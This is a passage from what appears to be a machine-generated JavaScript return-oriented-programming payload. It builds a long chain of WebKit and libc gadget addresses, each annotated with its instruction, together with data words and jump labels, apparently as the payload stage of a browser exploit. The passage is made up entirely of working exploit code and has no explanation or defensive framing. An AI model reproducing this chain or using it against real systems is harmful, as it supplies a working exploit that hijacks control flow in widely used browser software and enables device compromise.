webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+435952, //L9256
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+435936, //L9255
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9254:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9255:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9256:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+436120, //L9258
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+436136, //L9259
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+436104, //L9257
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9257:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9258:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9259:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+436280, //L9262
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+436296, //L9263
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+436248, //L9260
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9260:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9261:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L9262:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9263:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+436368, //L9264
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9264:
db([0, 0]); // 0x0
//L9205:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+436496, //L9267
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+436512, //L9268
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+436480, //L9266
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9266:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9267:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9268:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+436624, //L9270
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+436672, //L9273
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+436640, //L9271
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9270:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9271:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9272:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9273:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+436784, //L9274+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+436776, //L9274
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9274:
db([0, 0]); // 0x0
set_gadgets([
ropchain+436800, //L9274+24
ropchain+466456, //L9269
libc_base+764760, //pop rsi
ropchain+436840, //L9275
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9275:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9277:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+436960, //L9280
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+436944, //L9278
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9278:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9280:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+437136, //L9283
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+437152, //L9284
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+437104, //L9281
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+437120, //L9282
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9281:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9282:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9283:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9284:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+437248, //L9286
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+437232, //L9285
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9285:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9286:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9287:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9288:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L9289:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+437448, //L9291
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9291:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+437504, //L9292
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9292:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+437640, //L9296
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+437624, //L9295
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9294:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9295:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9296:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+437776, //L9299
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+437808, //L9301
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+437760, //L9298
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9298:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9299:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9300:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9301:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+437920, //L9302+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+437912, //L9302
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9302:
db([0, 0]); // 0x0
set_gadgets([
ropchain+437936, //L9302+24
ropchain+444912, //L9297
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9303:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9305:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+438072, //L9308
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+438056, //L9306
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9306:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9308:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+438232, //L9312
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+438184, //L9309
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+438200, //L9310
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9309:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9310:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9311:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L9312:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+438288, //L9313
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9313:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9315:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+438408, //L9316
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+438424, //L9318
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9316:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9318:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+438512, //L9319
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+438528, //L9321
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9319:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9321:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9322:
db([4294967240, 4294967295]); // -0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L9324:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+438688, //L9327
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+438672, //L9325
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9325:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9327:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+438864, //L9330
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+438880, //L9331
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+438832, //L9328
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+438848, //L9329
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9328:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9329:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9330:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9331:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+438976, //L9333
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+438960, //L9332
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9332:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9333:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+439056, //L9334
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9334:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9336:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+439176, //L9339
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+439160, //L9337
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9337:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9339:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+439352, //L9342
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+439368, //L9343
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+439320, //L9340
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+439336, //L9341
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9340:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9341:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9342:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9343:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+439464, //L9345
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+439448, //L9344
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9344:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9345:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+439544, //L9346
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9346:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9348:
db([4294967284, 4294967295]); // -0xc
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+439664, //L9351
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+439648, //L9349
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9349:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9351:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+439840, //L9354
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+439856, //L9355
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+439808, //L9352
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+439824, //L9353
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9352:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9353:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9354:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9355:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+439952, //L9357
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+439936, //L9356
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9356:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9357:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+440032, //L9358
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9358:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9360:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+440152, //L9363
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+440136, //L9361
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9361:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9363:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+440328, //L9366
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+440344, //L9367
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+440296, //L9364
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+440312, //L9365
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9364:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9365:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9366:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9367:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+440504, //L9371
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+440472, //L9369
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+440488, //L9370
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9368:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9369:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9370:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9371:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+440608, //L9373
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+440592, //L9372
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9372:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9373:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+440688, //L9374
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9374:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9376:
db([4294967240, 4294967295]); // -0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+440808, //L9379
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+440792, //L9377
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9377:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9379:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+440952, //L9382
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+440920, //L9380
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+440936, //L9381
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9380:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9381:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9382:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+441032, //L9383
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9383:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9384:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9385:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+441176, //L9386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+441208, //L9388
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+441192, //L9387
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9386:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9387:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9388:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+441320, //L9390
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L9389:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9390:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+441424, //L9391
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9391:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9392:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9393:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+441552, //L9395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+441536, //L9394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9394:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9395:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+441632, //L9396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9396:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9398:
db([4294967240, 4294967295]); // -0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+441752, //L9401
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+441736, //L9399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9399:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9401:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+441864, //L9402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+441896, //L9404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+441880, //L9403
